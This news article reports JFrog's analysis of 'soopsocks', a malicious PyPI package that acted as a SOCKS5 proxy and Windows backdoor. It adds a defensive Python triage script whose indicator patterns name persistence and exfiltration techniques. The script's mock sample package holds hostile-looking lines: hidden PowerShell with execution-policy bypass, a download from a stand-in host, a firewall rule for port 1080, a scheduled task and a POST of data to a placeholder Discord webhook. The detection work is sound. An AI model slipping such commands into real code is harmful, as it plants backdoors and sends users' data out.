Malicious PyPI package ‘soopsocks’ acted as SOCKS5 proxy and Windows backdoor, researchers say

Cybersecurity researchers flagged a malicious package on the Python Package Index (PyPI) that presented itself as a SOCKS5 proxy but also contained backdoor-like functionality. The package, named soopsocks, attracted 2,653 downloads before it was removed. It was first uploaded on September 26, 2025 by a user registered as soodalpie, whose publisher account was created the same day.

In published analysis, JFrog said the package behaved as a backdoor proxy server targeting Windows and was installed automatically by either a VBScript or a compiled executable. The executable, “_AUTORUN.EXE”, is a compiled Go binary that implements SOCKS5 functionality while also running PowerShell scripts, setting firewall rules and attempting to relaunch itself with elevated privileges, the report said.

JFrog’s analysis said the malware performs basic system and network reconnaissance, including checking Internet Explorer security settings and the Windows installation date, and exfiltrates the collected information to a hard-coded Discord webhook. Package versions 0.2.5 and 0.2.6 drop a Visual Basic script, “_AUTORUN.VBS”, which launches a PowerShell script that downloads a ZIP containing a legitimate Python binary from an external host and builds a batch script to install and run the package via pip.

The PowerShell and batch steps, the analysis said, cause the Python component to execute, attempt privilege elevation, configure firewall rules to allow UDP and TCP traffic on port 1080, register the software as a Windows service and establish persistence through a scheduled task so the code restarts after a reboot. JFrog pointed to the transition from simple Python scripts to a Go executable with hard-coded parameters as an indicator of malicious intent.
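The behaviour reported in the two paragraphs above (an `_AUTORUN` dropper, a PowerShell stage that downloads and unpacks a ZIP, a firewall rule for port 1080, a scheduled task, a service and a Discord webhook) is visible as plain strings in the package files before anything is installed. The following is an added example of a pre-install triage script, written for this article and not JFrog's or Socket's tooling: it walks an unpacked package directory, matches each file against indicator patterns derived from the reported behaviour, and returns a rough verdict. The sample package it scans is constructed in a temporary directory for the demonstration; its file contents, the placeholder webhook URL and the `example.invalid` download host are invented and are not the real malware.

```python
"""Pre-install triage of an unpacked PyPI package for soopsocks-style indicators.
Added example for this article; not JFrog's or Socket's code."""
import os
import re
import tempfile
from pathlib import Path

# Indicator patterns derived from the behaviour reported for soopsocks.
# The webhook pattern matches the public shape of a Discord webhook URL; the
# rest are command or cmdlet fragments an installer of this kind would need.
INDICATORS = {
    "discord_webhook": re.compile(
        r"https://(?:discord|discordapp)\.com/api/webhooks/\d+/[\w-]+"),
    "autorun_dropper": re.compile(r"_AUTORUN\.(?:VBS|EXE)", re.I),
    "firewall_rule": re.compile(
        r"netsh\s+advfirewall\s+firewall\s+add\s+rule|New-NetFirewallRule", re.I),
    "socks_port_1080": re.compile(r"(?:localport|port)\s*[=:]?\s*1080\b", re.I),
    "scheduled_task": re.compile(
        r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I),
    "service_install": re.compile(r"sc(?:\.exe)?\s+create|New-Service", re.I),
    "elevation_attempt": re.compile(r"-Verb\s+RunAs|ShellExecute\w*\([^)]*runas", re.I),
    "powershell_download": re.compile(
        r"Invoke-WebRequest|DownloadFile\(|Expand-Archive", re.I),
}

# Text and script files plus .exe: Go binaries keep their hard-coded
# parameters as clear strings, so a loose decode still finds them.
SCAN_SUFFIXES = {".py", ".vbs", ".ps1", ".bat", ".cmd", ".txt", ".cfg", ".toml", ".exe"}


def scan_package(root):
    """Return {relative_path: [indicator names]} for every file that matches."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        # The file name itself is an indicator (the dropper is named _AUTORUN.*),
        # so it is scanned together with the decoded contents.
        text = path.name + "\n" + path.read_bytes().decode("utf-8", errors="ignore")
        found = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if found:
            hits[str(path.relative_to(root)).replace(os.sep, "/")] = found
    return hits


def verdict(hits):
    """Coarse scoring: a webhook or dropper alone is enough to block; two or
    more persistence/elevation indicators together also block; anything else
    that matched is left for manual review."""
    names = {n for found in hits.values() for n in found}
    if {"discord_webhook", "autorun_dropper"} & names:
        return "block"
    persistence = {"firewall_rule", "scheduled_task", "service_install", "elevation_attempt"}
    if len(names & persistence) >= 2:
        return "block"
    return "review" if names else "clean"


def build_sample_package(base):
    """Constructed mock laid out like the reported package. Contents, the
    placeholder webhook and the download host are invented for the demo."""
    pkg = Path(base) / "soopsocks_sample"
    pkg.mkdir(parents=True, exist_ok=True)
    (pkg / "__init__.py").write_text(
        "import os, subprocess\n"
        "subprocess.Popen(['wscript', os.path.join(os.path.dirname(__file__), '_AUTORUN.VBS')])\n")
    (pkg / "_AUTORUN.VBS").write_text(
        'Set sh = CreateObject("WScript.Shell")\n'
        'sh.Run "powershell -ep bypass -File setup.ps1", 0, False\n')
    (pkg / "setup.ps1").write_text(
        "Invoke-WebRequest -Uri https://example.invalid/python.zip -OutFile py.zip\n"
        "Expand-Archive py.zip .\n"
        "netsh advfirewall firewall add rule name=proxy dir=in action=allow protocol=TCP localport=1080\n"
        "schtasks /create /tn proxy /tr run.bat /sc onstart\n"
        "Invoke-RestMethod -Method Post -Body $info "
        "-Uri https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN\n")
    (pkg / "proxy.py").write_text("import socket\n")  # benign file, should not match
    return pkg


def run_demo():
    """Build the constructed sample in a temp dir, scan it, return (hits, verdict)."""
    with tempfile.TemporaryDirectory() as tmp:
        hits = scan_package(build_sample_package(tmp))
    return hits, verdict(hits)


if __name__ == "__main__":
    demo_hits, demo_verdict = run_demo()
    for rel, names in demo_hits.items():
        print(f"{rel}: {', '.join(names)}")
    print("verdict:", demo_verdict)
```

To use it on a real candidate, fetch the artifact without installing it (`pip download --no-deps <name>==<version>`), unpack the wheel or sdist, and point `scan_package` at the directory. String matching of this kind is triage rather than a verdict: a legitimate package that manages firewall rules or scheduled tasks will land in `review`, and a packer or obfuscation layer will hide the strings, which is exactly why JFrog's move-to-Go observation matters.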

The disclosure comes amid broader concerns about software supply chain security. Package maintainers have raised concerns about CI/CD 2FA workflows and token management after recent changes, Socket said. GitHub has said it will revoke legacy npm tokens and shorten their default expiration windows, and Socket has released a free tool, Socket Firewall, that blocks known malicious packages at install time across ecosystems, the company added.